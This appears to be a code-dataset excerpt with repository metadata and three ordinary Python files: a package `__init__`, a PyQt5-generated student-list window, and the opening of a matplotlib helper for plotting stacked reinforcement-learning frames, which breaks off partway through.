LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 2
|
2020-12-18T01:47:55.000Z
|
2020-12-25T10:08:30.000Z
|
setup_python_package/badges/__init__.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | null | null | null |
from .add_badge import badge_exists, load_badges, add_badge, validate_badge_generator, extract_image_url
__all__ = [
"badge_exists",
"load_badges",
"add_badge",
"validate_badge_generator",
"extract_image_url"
]
| 25.666667
| 104
| 0.744589
| 29
| 231
| 5.275862
| 0.448276
| 0.156863
| 0.196078
| 0.27451
| 0.862745
| 0.862745
| 0.862745
| 0.862745
| 0.862745
| 0.862745
| 0
| 0
| 0.160173
| 231
| 9
| 105
| 25.666667
| 0.78866
| 0
| 0
| 0
| 0
| 0
| 0.314655
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2de4ec7649eb5ac5dd6a266b6f6b082f13a04977
| 23,139
|
py
|
Python
|
python/StudentList.ui.py
|
alielmorsy/CollegeSystem
|
634f50002f31f805cd428538f63a754f32d16e7a
|
[
"Apache-2.0"
] | null | null | null |
python/StudentList.ui.py
|
alielmorsy/CollegeSystem
|
634f50002f31f805cd428538f63a754f32d16e7a
|
[
"Apache-2.0"
] | null | null | null |
python/StudentList.ui.py
|
alielmorsy/CollegeSystem
|
634f50002f31f805cd428538f63a754f32d16e7a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'StudentList.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    """Generated UI class for the student-list window.

    Produced by pyuic5 (PyQt5 5.13.0) from 'StudentList.ui'.  Do NOT edit by
    hand -- regenerate from the .ui file instead; manual changes will be
    overwritten (see the file header warning).
    Widgets exposed to controller code: self.table (25x5 QTableWidget),
    self.section (QSpinBox 1..12), self.label, self.back (QPushButton).
    """
    def setupUi(self, MainWindow):
        """Create all child widgets of MainWindow and set their static properties."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(720, 632)
        MainWindow.setTabShape(QtWidgets.QTabWidget.Rounded)
        MainWindow.setDockNestingEnabled(True)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # --- student table: 25 rows x 5 columns, single-cell selection ---
        self.table = QtWidgets.QTableWidget(self.centralwidget)
        self.table.setGeometry(QtCore.QRect(9, 66, 691, 561))
        self.table.setAutoScrollMargin(20)
        self.table.setEditTriggers(QtWidgets.QAbstractItemView.DoubleClicked)
        self.table.setAlternatingRowColors(True)
        self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
        self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectItems)
        self.table.setShowGrid(True)
        self.table.setRowCount(25)
        self.table.setObjectName("table")
        self.table.setColumnCount(5)
        # Column header items (text is assigned later in retranslateUi).
        item = QtWidgets.QTableWidgetItem()
        self.table.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.table.setHorizontalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.table.setHorizontalHeaderItem(2, item)
        item = QtWidgets.QTableWidgetItem()
        self.table.setHorizontalHeaderItem(3, item)
        item = QtWidgets.QTableWidgetItem()
        self.table.setHorizontalHeaderItem(4, item)
        # Pre-created cell items from the .ui file.  Flags differ per cell:
        # rows 0-2 column 0 additionally carry ItemIsTristate, and (9, 0) is
        # user-checkable but NOT enabled; most cells are
        # selectable|drag-enabled|enabled.  Rows 6-7 only get column 1, and
        # rows 21-24 also get a column-2 item.
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled|QtCore.Qt.ItemIsTristate)
        self.table.setItem(0, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(0, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled|QtCore.Qt.ItemIsTristate)
        self.table.setItem(1, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(1, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled|QtCore.Qt.ItemIsTristate)
        self.table.setItem(2, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(2, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(3, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(3, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(4, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(4, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(5, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(5, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(6, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(7, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(8, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(8, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsUserCheckable)
        self.table.setItem(9, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(9, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(10, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(10, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(11, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(11, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(12, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(12, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(13, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(13, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(14, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(14, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(15, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(15, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(16, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(16, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(17, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(17, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(18, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(18, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(19, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(19, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(20, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(20, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(21, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(21, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(21, 2, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(22, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(22, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(22, 2, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(23, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(23, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(23, 2, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(24, 0, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(24, 1, item)
        item = QtWidgets.QTableWidgetItem()
        item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
        self.table.setItem(24, 2, item)
        # Header sizing and sort-indicator behaviour.
        self.table.horizontalHeader().setCascadingSectionResizes(False)
        self.table.horizontalHeader().setDefaultSectionSize(130)
        self.table.horizontalHeader().setMinimumSectionSize(50)
        self.table.horizontalHeader().setSortIndicatorShown(True)
        self.table.verticalHeader().setCascadingSectionResizes(True)
        self.table.verticalHeader().setDefaultSectionSize(50)
        self.table.verticalHeader().setMinimumSectionSize(50)
        self.table.verticalHeader().setSortIndicatorShown(False)
        # --- section selector spin box (range set to 1..12 below) ---
        self.section = QtWidgets.QSpinBox(self.centralwidget)
        self.section.setGeometry(QtCore.QRect(270, 18, 431, 31))
        # Custom orange palette for the spin box, one brush per
        # (color group, color role) pair.  Active group:
        palette = QtGui.QPalette()
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
        # Inactive group (same colors as Active):
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
        # Disabled group (text roles darkened, Base matches the Window orange):
        brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
        self.section.setPalette(palette)
        font = QtGui.QFont()
        font.setPointSize(10)
        self.section.setFont(font)
        self.section.setMinimum(1)
        self.section.setMaximum(12)
        self.section.setObjectName("section")
        # --- "Section" label next to the spin box ---
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(170, 20, 71, 23))
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.label.setFont(font)
        self.label.setObjectName("label")
        # --- "Back" navigation button ---
        self.back = QtWidgets.QPushButton(self.centralwidget)
        self.back.setGeometry(QtCore.QRect(10, 16, 131, 41))
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setBold(True)
        font.setWeight(75)
        self.back.setFont(font)
        self.back.setObjectName("back")
        MainWindow.setCentralWidget(self.centralwidget)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Assign all user-visible strings (wrapped for Qt translation)."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.table.setSortingEnabled(False)
        # Column header captions.
        item = self.table.horizontalHeaderItem(0)
        item.setText(_translate("MainWindow", "Name"))
        item = self.table.horizontalHeaderItem(1)
        item.setText(_translate("MainWindow", "UserID"))
        item = self.table.horizontalHeaderItem(2)
        item.setText(_translate("MainWindow", "No.Absent"))
        item = self.table.horizontalHeaderItem(3)
        item.setText(_translate("MainWindow", "ExamBlocked"))
        item = self.table.horizontalHeaderItem(4)
        item.setText(_translate("MainWindow", "MidTerm"))
        # Sorting is suspended while cell text is written, then restored.
        __sortingEnabled = self.table.isSortingEnabled()
        self.table.setSortingEnabled(False)
        # Placeholder cell text from the .ui file (presumably designer test
        # data -- verify against the .ui source before relying on it).
        item = self.table.item(0, 0)
        item.setText(_translate("MainWindow", "j"))
        self.table.setSortingEnabled(__sortingEnabled)
        self.label.setText(_translate("MainWindow", "Section"))
        self.back.setText(_translate("MainWindow", "Back"))
if __name__ == "__main__":
    # Manual smoke test: launch the generated window standalone.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QMainWindow()
    form = Ui_MainWindow()
    form.setupUi(window)
    window.show()
    sys.exit(app.exec_())
| 57.416873
| 127
| 0.692727
| 2,498
| 23,139
| 6.406725
| 0.078062
| 0.101975
| 0.103287
| 0.115471
| 0.831292
| 0.821607
| 0.817796
| 0.791802
| 0.791802
| 0.789615
| 0
| 0.027059
| 0.191841
| 23,139
| 402
| 128
| 57.559701
| 0.82877
| 0.007995
| 0
| 0.534884
| 1
| 0
| 0.008916
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005168
| false
| 0
| 0.005168
| 0
| 0.01292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa79e025e0c0006ec081d79a163463cdc1c4b17a
| 4,154
|
py
|
Python
|
evkit/utils/viz/rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 120
|
2019-04-22T04:45:28.000Z
|
2022-03-23T01:53:17.000Z
|
evkit/utils/viz/rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 14
|
2019-06-12T08:21:21.000Z
|
2021-08-25T15:36:58.000Z
|
evkit/utils/viz/rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 19
|
2019-06-19T07:00:36.000Z
|
2022-03-24T07:18:30.000Z
|
from .core import rescale_image
import matplotlib.pyplot as plt
import numpy as np
import torch
def plot_stacked_frames(stacked_observations, rollout_idx=0, axis_order='RCWH', im_val_scale=(0.0, 1.0), noshow=False):
    ''' Plot each stacked frame of one rollout side by side in a single figure.

        Parameters:
            stacked_observations: a StackedObservationStorage object
            rollout_idx: which rollout to visualize
            axis_order: 'RCWH' = RolloutIdx x Channel x Width x Height
                        ('RWHC' means the channel axis is already last)
            im_val_scale: if the image is a float, the (min, max) range of the inputs
            noshow: not implemented -- raises NotImplementedError when True
    '''
    # Fixed: removed a leftover debug print of frame.shape inside the loop,
    # and corrected the docstring parameter name (was "stacked_obs").
    if noshow:
        raise NotImplementedError("Bug! Noshow not yet implemented")
    assert axis_order in ['RCWH', 'RWHC']
    fig, ax = plt.subplots(figsize=(15, 15))
    n_stacked = stacked_observations.n_stack
